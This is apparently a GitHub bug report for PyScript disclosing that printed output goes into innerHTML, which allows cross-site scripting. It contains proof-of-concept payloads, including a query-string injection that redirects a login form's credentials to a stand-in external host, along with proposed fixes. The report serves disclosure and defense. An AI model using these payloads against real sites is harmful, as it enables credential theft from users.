Printing is susceptible to cross-site scripting vulnerabilities by default

**Describe the bug**
PyScript writes stdout from Python to a div element using its innerHTML property. From [base.ts](https://github.com/pyscript/pyscript/blob/8c65cad209ed91f4bc8e0f5ebecf877bd29d3de2/pyscriptjs/src/components/base.ts#L45):

```typescript
    addToOutput(s: string) {
        this.outputElement.innerHTML += '<div>' + s + '</div>';
        this.outputElement.hidden = false;
    }
```

This method of writing stdout is prone to [cross-site scripting](https://owasp.org/www-community/attacks/xss/) (XSS) vulnerabilities. Rather than writing using innerHTML, the default should be to use a safe output method, such as appending a text node to the output element, or outputting to the console log.

**To Reproduce**
You can get PyScript to run arbitrary JavaScript when printing to stdout by using an XSS payload such as this:

```html
<img src="x" onerror="alert('XSS')" />
```

When the browser encounters this, it tries to load the image from the source `x`, but since there is no image there, it then runs the code in the `onerror` attribute. This pops up an alert dialog with the content "XSS".

This is shown with the following HTML:

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>JavaScript execution from Python stdout</title>
    <link rel="stylesheet" href="https://pyscript.net/alpha/pyscript.css" />
    <script defer src="https://pyscript.net/alpha/pyscript.js"></script>
</head>
<body>
    Example of JavaScript execution from Python stdout:
    <py-script>
payload = "<"
payload += """img src="x" onerror="alert('XSS')"/>"""
print(payload)
    </py-script>
</body>
</html>
```

(Note: here I am splitting up the payload before printing it, as if you try to print it all at once it will get executed when the page first loads, before the browser processes the `<py-script></py-script>` tags.)

To demonstrate why this is a security problem, consider the following example, where PyScript greets the user based on the `name` query parameter in the URL. The example also contains a sample login form where the user inputs their username and password in order to post comments. The login form sends the username and password `/login.php`, which would handle the login logic. (The login logic itself is omitted for the sake of simplicity.)

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Dynamic PyScript greeting</title>
    <link rel="stylesheet" href="https://pyscript.net/alpha/pyscript.css" />
    <script defer src="https://pyscript.net/alpha/pyscript.js"></script>
    <style>
        h1 {
            font-size: 30px;
        }

        h2 {
            font-size: 20px;
        }

        form {
            border: 3px solid #f1f1f1;
            max-width: 500px;
            padding: 16px;
            margin: 12px;
        }

        input {
            width: 100%;
            padding: 12px 20px;
            margin: 8px 0;
            display: inline-block;
            border: 1px solid #ccc;
            box-sizing: border-box;
        }

        button {
            background-color: #04AA6D;
            color: white;
            padding: 14px 20px;
            margin: 8px 0;
            border: none;
            cursor: pointer;
            width: 100%;
        }
    </style>
</head>
<body>
    
    <h1>Dynamic PyScript greeting</h1>
    <py-script>
from js import location
from urllib.parse import urlparse, parse_qs

query = urlparse(str(location)).query
try:
    name = parse_qs(query)["name"][0]
except (KeyError, IndexError):
    name = "PyScript"
print(f"Hello, {name}!")
    </py-script>

    
    <form id="login-form" action="/login.php" method="post">
        <h2>Log in to post comments:</h2>
        <label for="username">Username</label>
        <input type="text" placeholder="Enter Username" name="username" required>

        <label for="password">Password</label>
        <input type="password" placeholder="Enter Password" name="password" required>
            
        <button type="submit">Login</button>
    </form>
</body>
</html>

```

With no `name` parameter, the script shows the message "Hello, PyScript!".

![HTML page displaying the message "Hello, PyScript!"](https://user-images.githubusercontent.com/5244112/168423414-5eff1126-cb0e-45de-a05b-6ec49cdddc00.png)

When we provide the query string `?name=Test`, the script shows the message "Hello, Test!"

![HTML page displaying the message "Hello, Test!"](https://user-images.githubusercontent.com/5244112/168423426-ac72012c-fffa-4f40-bccd-d0d195c809c3.png)

However, as the output of the Python `print` function is being written to the output div using the `innerHTML` property, it is possible to inject HTML and JavaScript using the `name` query parameter. There are many nefarious things an attacker could use this for, but as an example, here is a payload that changes the login form to send the user's username and password to https://example.com instead of to `/login.php`.

```
?name=XSS%3Cimg%20src=%22x%22%20onerror=%22document.getElementById('login-form').action%3D'https://example.com'%22/%3E
```

After URL decoding, this is what gets printed by PyScript:

```
XSS<img src="x" onerror="document.getElementById('login-form').action='https://example.com'"/>
```

Opening the page with this query string gives the following output:

![HTML page displaying the message "Hello, XSS" followed by a broken image link](https://user-images.githubusercontent.com/5244112/168423430-4dad514d-2ec5-4102-af5b-b5042386c1b0.png)

If you look at the developer tools, you can see that clicking on the Login button actually does send the user's username and password to https://example.com.

![Developer Tools network tab showing username and password being sent to example.com](https://user-images.githubusercontent.com/5244112/168423435-e3d03cc3-4f3f-4432-939b-5a93a77fd74c.png)

One way of exploiting this would be for an attacker to send a link containing the malicious payload above to the victim, perhaps through an email. When doing so, the attacker would not use example.com, but instead they would use a domain that they control. The victim then clicks the link and tries to log in to post a comment. When the victim clicks the Login button, their username and password are sent to the attacker's server. The attacker can inspect the server logs to find the victim's username and password, and then take over the victim's account.

**Mitigation**

When users implement PyScript scripts, they can mitigate this issue by HTML-encoding everything written to stdout. This can be done with [html.escape](https://docs.python.org/3/library/html.html#html.escape), like this:

```python
import html

print(html.escape("""<img src="x" onerror="alert('This will not be executed')" />"""))
```

However, this relies on a) users knowing that they should do this, b) users escaping all of their output correctly, and c) third-party libraries also escaping output written to stdout. This is unlikely to happen, especially when users are less familiar with security issues.

Instead, it would be much better for PyScript to have secure defaults when writing output. This could be done by wrapping the stdout value in a text node using [Document.createTextNode](https://developer.mozilla.org/en-US/docs/Web/API/Document/createTextNode) before appending it to the DOM, or by logging stdout to the console with [console.log](https://developer.mozilla.org/en-US/docs/Web/API/Console/log) instead of writing it to the DOM.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Printing is susceptible to cross-site scripting vulnerabilities by default #373

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Printing is susceptible to cross-site scripting vulnerabilities by default #373

Description

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions